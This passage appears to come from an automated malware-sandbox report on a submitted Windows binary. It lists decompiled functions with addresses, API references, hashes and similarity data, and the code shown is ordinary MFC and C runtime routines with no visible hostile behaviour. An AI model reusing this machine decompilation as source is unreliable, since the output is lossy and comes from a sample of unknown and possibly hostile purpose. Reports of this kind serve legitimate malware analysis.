				E004014C0(_t69 - 0x34, __edx);
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				if((E00412B38(_t68) & 0x00004000) == 0) {
					_t32 =  *((intOrPtr*)(_t68 + 0xc4));
					_t57 = _t69 - 0x34;
					E00405E21(_t69 - 0x34, __edx,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t32 - 0xc)));
					if(_t65 != 0) {
						E00405EC1(_t69 - 0x34, " - ");
						_t57 = _t69 - 0x34;
						E00405EC1(_t69 - 0x34, _t65);
						_t39 =  *((intOrPtr*)(_t68 + 0x58));
						if(_t39 > 0) {
							swprintf(_t69 - 0x30, 0x20, ":%d", _t39);
							_t57 = _t69 - 0x34;
							E00405EC1(_t69 - 0x34, _t69 - 0x30);
						}
					}
					L9:
					_t66 =  *((intOrPtr*)(_t69 - 0x34));
					E0041FC5A(_t57, _t63,  *((intOrPtr*)(_t68 + 0x20)),  *((intOrPtr*)(_t69 - 0x34)));
					E004010B0(_t66 - 0x10, _t63);
					return E00431B87(_t53, _t66, _t68);
				}
				if(_t65 == 0) {
					L5:
					_t44 =  *((intOrPtr*)(_t68 + 0xc4));
					_t57 = _t69 - 0x34;
					E00405E21(_t69 - 0x34, _t63,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t44 - 0xc)));
					goto L9;
				}
				E00405EC1(_t69 - 0x34, _t65);
				_t47 =  *((intOrPtr*)(_t68 + 0x58));
				if(_t47 > 0) {
					swprintf(_t69 - 0x30, 0x20, ":%d", _t47);
					E00405EC1(_t69 - 0x34, _t69 - 0x30);
				}
				E00405EC1(_t69 - 0x34, " - ");
				goto L5;
			}








                  0x0040b638
                  0x0040b638
                  0x0040b638
                  0x0040b63f
                  0x0040b644
                  0x0040b647
                  0x0040b64c
                  0x0040b651
                  0x0040b661
                  0x0040b6b8
                  0x0040b6c1
                  0x0040b6c5
                  0x0040b6cc
                  0x0040b6d6
                  0x0040b6dc
                  0x0040b6df
                  0x0040b6e4
                  0x0040b6e9
                  0x0040b6f7
                  0x0040b703
                  0x0040b706
                  0x0040b706
                  0x0040b6e9
                  0x0040b70b
                  0x0040b70b
                  0x0040b712
                  0x0040b71a
                  0x0040b724
                  0x0040b724
                  0x0040b665
                  0x0040b6a4
                  0x0040b6a4
                  0x0040b6ad
                  0x0040b6b1
                  0x00000000
                  0x0040b6b1
                  0x0040b66b
                  0x0040b670
                  0x0040b675
                  0x0040b683
                  0x0040b692
                  0x0040b692
                  0x0040b69f
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040B63F
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • swprintf.LIBCMT ref: 0040B683
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0040B6F7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_LongWindow__vsprintf_s_l
                  • String ID: - $:%d
                  • API String ID: 949706672-2359489159
                  • Opcode ID: d0422e2dded8b7fd773f17d4d3136ba2301167d030006d4a28d0c87d5d88689d
                  • Instruction ID: 25aa097095ec528b029b11460ad35e3228e7385f7c42c63496193b1bf4d06049
                  • Opcode Fuzzy Hash: d0422e2dded8b7fd773f17d4d3136ba2301167d030006d4a28d0c87d5d88689d
                  • Instruction Fuzzy Hash: A3213271911604ABDB14FB91D952EAFBB79EF14705F10042FB541B32D2EB38AB05CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C509, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E0040C509(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E0040C354() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E00433504(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x466328(_a4, _a8);
			}








                  0x0040c518
                  0x0040c531
                  0x0040c59c
                  0x0040c59c
                  0x0040c59e
                  0x00000000
                  0x0040c59f
                  0x0040c533
                  0x0040c53a
                  0x00000000
                  0x0040c553
                  0x0040c554
                  0x0040c557
                  0x0040c565
                  0x0040c568
                  0x0040c570
                  0x0040c571
                  0x0040c572
                  0x0040c573
                  0x0040c57a
                  0x0040c57d
                  0x0040c581
                  0x0040c590
                  0x0040c595
                  0x0040c598
                  0x00000000
                  0x0040c598
                  0x0040c53a
                  0x00000000

                  APIs
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040C549
                  • GetSystemMetrics.USER32 ref: 0040C561
                  • GetSystemMetrics.USER32 ref: 0040C568
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: System$Metrics$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 3136151823-3316187204
                  • Opcode ID: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction ID: 791c3770960fa488d4c8b65a8903be86f79acb93c7c19c9457816c0bfd0009e2
                  • Opcode Fuzzy Hash: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction Fuzzy Hash: DC11C475500334FBDB119F658CC1A5BBBA8EF0A751F0441B2FD05BA186D2B4E940CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041765C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041765C(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040CD15(__ecx, __eflags, _t26) == 0) {
					_t10 = E0040F8D7(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E0040D369(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E0041FE04(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                  0x0041765c
                  0x0041765c
                  0x00417663
                  0x00417667
                  0x00417670
                  0x00417679
                  0x0041767e
                  0x00417680
                  0x0041768c
                  0x0041768c
                  0x00417693
                  0x004176ee
                  0x00000000
                  0x004176f1
                  0x00417695
                  0x00417698
                  0x0041769b
                  0x004176a2
                  0x004176ac
                  0x004176ae
                  0x00000000
                  0x00000000
                  0x004176b7
                  0x004176bc
                  0x004176be
                  0x00000000
                  0x00000000
                  0x004176c5
                  0x004176cb
                  0x004176cd
                  0x004176da
                  0x004176e6
                  0x00000000
                  0x004176e6
                  0x004176d0
                  0x004176d6
                  0x004176d8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004176d8
                  0x0041769d
                  0x004176a0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004176a0
                  0x00417682
                  0x00417686
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00417688
                  0x00417672
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: Edit
                  • API String ID: 0-554135844
                  • Opcode ID: e5a8fbd5211fc8f9753fdabb740f9ce976cc7a36ade03de3bd11c94130eaabfa
                  • Instruction ID: 5a368e719720fe148af9716c8c30e3ccc30df2ef8c2af582a91a041a80413f67
                  • Opcode Fuzzy Hash: e5a8fbd5211fc8f9753fdabb740f9ce976cc7a36ade03de3bd11c94130eaabfa
                  • Instruction Fuzzy Hash: 4D117031308A05ABEB20573A8D05B9BB679BF45760F24443BF901E21A1EF78DC91C56D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405AD1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00405AD1(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
				_t35 = E00404461(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E00405A9D(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E00430CF4( &_a4, 0x45b150);
				asm("int3");
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					_t15 =  &_a4; // 0x4148e3
					E004048ED(0, _t36, _t37, _t38,  *_t15, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					_t12 =  &_a4; // 0x4148e3
					 *((char*)( *_t12)) = 0;
					_t29 = 0;
				}
				return _t29;
			}














                  0x00405ad1
                  0x00405ad1
                  0x00405ad1
                  0x00405ad1
                  0x00405ad1
                  0x00405ad8
                  0x00405ae5
                  0x00405ae7
                  0x00405aea
                  0x00405aec
                  0x00405af1
                  0x00405af3
                  0x00405af3
                  0x00405af8
                  0x00405afb
                  0x00405aff
                  0x00405b02
                  0x00405b0e
                  0x00405b13
                  0x00405b19
                  0x00405b1c
                  0x00405b21
                  0x00405b23
                  0x00405b23
                  0x00405b41
                  0x00405b54
                  0x00405b57
                  0x00405b62
                  0x00405b6a
                  0x00405b6a
                  0x00405b43
                  0x00405b43
                  0x00405b46
                  0x00405b48
                  0x00405b48
                  0x00405b6d

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00405AD8
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • __CxxThrowException@8.LIBCMT ref: 00405B0E
                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,004010A6,00000000,00000000,00000000,?,00406452,0045B150,00000004,004010A6,00000000,004148E3,00000000), ref: 00405B39
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • LocalFree.KERNEL32(?,004010A6,00000000,004148E3,00000000,0041F372,00406452), ref: 00405B62
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                  • String ID: HA
                  • API String ID: 1808948168-3712622743
                  • Opcode ID: c1bf25199e3fa9a73dcb31677cf4f596e0736fe5850b581e3f562f937981647b
                  • Instruction ID: 21ddc8a050848d7037dad2c523769ca223fa60ecfca11e4f480c40ccccb07167
                  • Opcode Fuzzy Hash: c1bf25199e3fa9a73dcb31677cf4f596e0736fe5850b581e3f562f937981647b
                  • Instruction Fuzzy Hash: EE11A371604249AFDB00DFA4CC81DAE3BA8FB08354F10853AFA29DA2D1D7759950CF18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041D29B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E0041D29B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t19;
				intOrPtr _t24;
				void* _t30;
				void* _t34;
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_t30 = __edx;
				_push(4);
				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
				_t34 = __ecx;
				E00405562(_t35 - 0x10, _t36, __ecx + 0xc);
				 *((intOrPtr*)(_t35 - 4)) = 0;
				E00428DD4(__ebx, __ecx);
				_t24 =  *((intOrPtr*)(_t35 - 0x10));
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) != 0) {
					_t19 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFileA");
					if(_t19 == 0) {
						L3:
						E004289DA(_t24);
						E004289B2( *((intOrPtr*)(_t34 + 0x10)), _t24);
					} else {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_t34 + 0x10)));
						_push(_t24);
						if( *_t19() == 0) {
							goto L3;
						}
					}
				}
				return E00431B73(E004010B0(_t24 - 0x10, _t30));
			}









                  0x0041d29b
                  0x0041d29b
                  0x0041d29b
                  0x0041d2a2
                  0x0041d2a7
                  0x0041d2b0
                  0x0041d2b9
                  0x0041d2bc
                  0x0041d2c4
                  0x0041d2ca
                  0x0041d2dd
                  0x0041d2e5
                  0x0041d2f6
                  0x0041d2f7
                  0x0041d300
                  0x0041d2e7
                  0x0041d2ea
                  0x0041d2eb
                  0x0041d2ec
                  0x0041d2ed
                  0x0041d2ee
                  0x0041d2ef
                  0x0041d2f4
                  0x00000000
                  0x00000000
                  0x0041d2f4
                  0x0041d2e5
                  0x0041d312

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041D2A2
                    • Part of subcall function 00428DD4: CloseHandle.KERNEL32(00000001,00000000,?,00429005,00000214,0041D43D), ref: 00428DE5
                    • Part of subcall function 00428DD4: GetLastError.KERNEL32(?,00000000,?,00429005,00000214,0041D43D), ref: 00428E0A
                  • GetModuleHandleA.KERNEL32(KERNEL32,?,00000004), ref: 0041D2D1
                  • GetProcAddress.KERNEL32(00000000,ReplaceFileA), ref: 0041D2DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Handle$AddressCloseErrorH_prolog3LastModuleProc
                  • String ID: KERNEL32$ReplaceFileA
                  • API String ID: 2918978038-852406001
                  • Opcode ID: b864da9d03b05b9abddfc5d24e857228753dc41ff1896ebf6b2d3a24ab6a7b79
                  • Instruction ID: 254d07cfdc885de2a667c59ca4814af56d0ccb4f5cbbd3dd343bfd892108a465
                  • Opcode Fuzzy Hash: b864da9d03b05b9abddfc5d24e857228753dc41ff1896ebf6b2d3a24ab6a7b79
                  • Instruction Fuzzy Hash: 33F081B0600654ABD721EBB6CC8AD6FB3B9FF84705740495FF42297591EF38A844CB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004358C8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E004358C8(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00435836(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E004302A3(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E004352A0(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0043551B(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E0043026A(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                  0x004358c8
                  0x004358c8
                  0x004358c8
                  0x004358c8
                  0x004358c8
                  0x004358cd
                  0x004358d1
                  0x004358d3
                  0x004358d6
                  0x004358d7
                  0x004358d8
                  0x004358db
                  0x004358e0
                  0x004358e0
                  0x004358e3
                  0x004358e7
                  0x004358ea
                  0x004358ef
                  0x004358ec
                  0x004358ec
                  0x004358ec
                  0x004358f2
                  0x004358f7
                  0x004358f9
                  0x004358fc
                  0x004358ff
                  0x00435900
                  0x00435908
                  0x0043590d
                  0x00435911
                  0x00435914
                  0x00435917
                  0x0043591d
                  0x0043591e
                  0x00435921
                  0x0043592b
                  0x0043592f
                  0x00000000
                  0x0043592f
                  0x00435935

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 004358DB
                    • Part of subcall function 00435836: ___BuildCatchObjectHelper.LIBCMT ref: 0043586C
                  • _UnwindNestedFrames.LIBCMT ref: 004358F2
                  • ___FrameUnwindToState.LIBCMT ref: 00435900
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: DE$csm
                  • API String ID: 2163707966-3980990743
                  • Opcode ID: 6b256480bc585ba215f2ccafec540f3fca98b31abab1096497f4781aab07a5e9
                  • Instruction ID: 4c93dfeaa140ac3f5d2b4f82d40a9fa80780d601a1f8fe3fc85248c70ccae2aa
                  • Opcode Fuzzy Hash: 6b256480bc585ba215f2ccafec540f3fca98b31abab1096497f4781aab07a5e9
                  • Instruction Fuzzy Hash: 0901E47100150ABBDF166E52CC45EAB7F6AEF0C358F009016BD1815121DB3A99B1EBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042277C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0042277C(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                  0x00422788
                  0x0042278a
                  0x00422796
                  0x00422798
                  0x004227a0
                  0x004227b1
                  0x004227b5
                  0x004227b8
                  0x004227b8
                  0x004227a2
                  0x004227aa
                  0x004227aa
                  0x004227c3

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • SetLastError.KERNEL32(00000078), ref: 004227B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction ID: 395a0e9ebdf5a2e1b80e510cae3e67cf4d98a6f7501344e6daefd505b8f3eb0f
                  • Opcode Fuzzy Hash: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction Fuzzy Hash: 07E02B373002147B82111F66AD0890A7E56E7C5B723658133F925D3290CA7588418768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00435257, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00435257(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t26 = __esi;
				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00436178(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E00436178(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E00436178(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x45e1d0);
						E00431818(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E00436178(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0043185D(E0043BF7D(_t23, _t24, _t25, _t26));
					}
				}
			}








                  0x00435257
                  0x00435257
                  0x00435257
                  0x00435261
                  0x00435268
                  0x00435287
                  0x0043528e
                  0x00435295
                  0x0043529a
                  0x0043529a
                  0x0043529a
                  0x00000000
                  0x0043526a
                  0x0043526a
                  0x0043526f
                  0x0043529c
                  0x0043529c
                  0x0043529f
                  0x00435271
                  0x00435276
                  0x004364bc
                  0x004364be
                  0x004364c3
                  0x004364cd
                  0x004364d2
                  0x004364d4
                  0x004364d8
                  0x004364e3
                  0x004364e3
                  0x004364f4
                  0x004364f4
                  0x0043526f

                  APIs
                  • __getptd.LIBCMT ref: 00435271
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00435282
                  • __getptd.LIBCMT ref: 00435290
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction ID: ce40cc71b876635b456ab49842eecf86f574a445523513ec0804e5d9cbf1e949
                  • Opcode Fuzzy Hash: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction Fuzzy Hash: 33E04F35500205AFCB60ABA5C446B6E33A4EB4E318F16A1E7E40CC7323C77CD850994A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00422744, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E00422744(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                  0x0042274c
                  0x0042275a
                  0x00422762
                  0x0042276f
                  0x00422772
                  0x00422764
                  0x00422769
                  0x00422769
                  0x0042277b

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • SetLastError.KERNEL32(00000078), ref: 00422772
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
